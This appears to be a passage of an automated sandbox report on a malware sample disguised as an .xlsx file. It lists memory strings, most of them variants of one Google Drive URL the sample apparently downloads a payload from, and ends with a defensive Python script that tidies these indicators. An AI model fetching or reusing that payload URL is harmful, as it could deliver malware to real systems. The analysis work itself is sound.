      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download)
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2139906617.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download-
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1805638779.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1887094172.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1832941399.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1887112325.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1859716292.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download0
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download2
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download5
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download9
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759140100.00000000072B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadG
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadQ
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadU
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2167654319.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2111662764.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2139906617.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download_
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloade
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadq
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadsc
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadt
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2683002885.000000000732E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadtC
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466810418.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2222675341.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2466765757.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2331421259.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249757292.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2084014689.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2413081299.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195091390.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2057485924.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2167654319.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195054189.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2574815814.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2494127726.0000000007376000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2277302457.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 
00000002.00000002.2759218527.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2304054986.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2358849652.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloady
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 
00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 
00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1722047455.0000000007336000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2628884404.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971881403.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971863163.0000000007375000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2656217920.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1945095137.0000000007377000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1750603166.000000000737A000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738254954.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2249921937.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.1971819578.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2602231584.0000000007374000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2738143957.0000000007373000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2001537381.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029830127.000000000732E000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 
00000002.00000003.2683002885.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2195106942.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000002.2759218527.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711412467.0000000007313000.00000004.00000020.00020000.00000000.sdmp, 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2711387950.0000000007373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: 09-FD-94.03.60.175.07.xlsx.exe, 00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
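The entries above are raw string-carving hits: the same Google Drive URL appears a dozen times with one or two stray bytes appended (download5, downloadQ, downloadsc, ...), because the carver ran past the terminator, and each hit is tagged with the memory region it came from. The helper below is an added example written for this page (it is not part of the Joe Sandbox report and not the sample's code). It parses the region identifiers, decodes the protection and region-type fields with the Win32 PAGE_* and MEM_* constants from winnt.h, and collapses the URL variants to one canonical URL per host and path by taking their longest common prefix. The field layout assumed for the identifier, process.stage.dumpid.base.protect.f6.type.f8, and the reading of the stage field (2 = final dump, 3 = intermediate dump) are inferred from the values on the page and are assumptions; the evidence list is a constructed subset of the page's entries.

```python
"""Triage helper for the 'String found in binary or memory' entries (added example)."""
import re
from collections import defaultdict
from os.path import commonprefix
from urllib.parse import parse_qs, urlsplit

# Win32 memory protection and region type constants (winnt.h).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <process>.<stage>.<dump id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp
REGION_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$"
)

# Constructed subset of the evidence on this page: (region identifier, carved string).
EVIDENCE = [
    ("00000002.00000002.2759218527.000000000732E000.00000004.00000020.00020000.00000000.sdmp",
     "https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download5"),
    ("00000002.00000003.2195106942.000000000732E000.00000004.00000020.00020000.00000000.sdmp",
     "https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadQ"),
    ("00000002.00000003.2249921937.000000000732E000.00000004.00000020.00020000.00000000.sdmp",
     "https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=downloadsc"),
    ("00000002.00000003.2029779940.0000000007377000.00000004.00000020.00020000.00000000.sdmp",
     "https://ssl.gstatic.com"),
    ("00000000.00000000.1483122569.000000000044A000.00000002.00000001.01000000.00000003.sdmp",
     "OriginalFilenamebiliousnesses.exeDVarFileInfo$"),
]


def parse_region(ident):
    """Split a .sdmp identifier into its fields and decode protect/type."""
    m = REGION_RE.match(ident)
    if not m:
        raise ValueError(f"unrecognised region identifier: {ident}")
    proc, stage, dump_id, base, protect, _f6, mem_type, _f8 = m.groups()
    protect_v, type_v = int(protect, 16), int(mem_type, 16)
    return {
        "process": int(proc, 16),   # sandbox process index, as in 0_2_... / 2_2_...
        "stage": int(stage, 16),    # assumed: 2 = final dump, 3 = intermediate dump
        "dump_id": int(dump_id),
        "base": int(base, 16),
        # Low byte carries the PAGE_* value; PAGE_GUARD/NOCACHE modifiers are ignored.
        "protect": PAGE_PROTECT.get(protect_v & 0xFF, hex(protect_v)),
        "type": MEM_TYPE.get(type_v, hex(type_v)),
    }


def canonical_urls(strings):
    """Group carved URLs by scheme/host/path and return the longest common
    prefix of each group. The variants differ only in the bytes the carver
    read past the terminator, so with two or more variants the prefix is the
    real URL. A group with a single variant keeps whatever tail it has."""
    groups = defaultdict(list)
    for s in strings:
        if s.startswith(("http://", "https://")):
            u = urlsplit(s)
            groups[(u.scheme, u.netloc, u.path)].append(s)
    return {key: commonprefix(variants) for key, variants in groups.items()}


def drive_file_id(url):
    """Return the Google Drive file id carried in ?id=..., or None."""
    return parse_qs(urlsplit(url).query).get("id", [None])[0]


def triage(evidence):
    """Summarise where the strings live and which download URLs they name."""
    regions = {ident: parse_region(ident) for ident, _ in evidence}
    urls = sorted(canonical_urls(s for _, s in evidence).values())
    drive_ids = sorted({drive_file_id(u) for u in urls} - {None})
    return {"regions": regions, "urls": urls, "drive_ids": drive_ids}


if __name__ == "__main__":
    result = triage(EVIDENCE)
    for r in result["regions"].values():
        print(f"pid {r['process']} base {r['base']:#010x} {r['protect']} {r['type']}")
    print("download URLs:", *result["urls"], sep="\n  ")
    print("Drive file ids:", result["drive_ids"])
```

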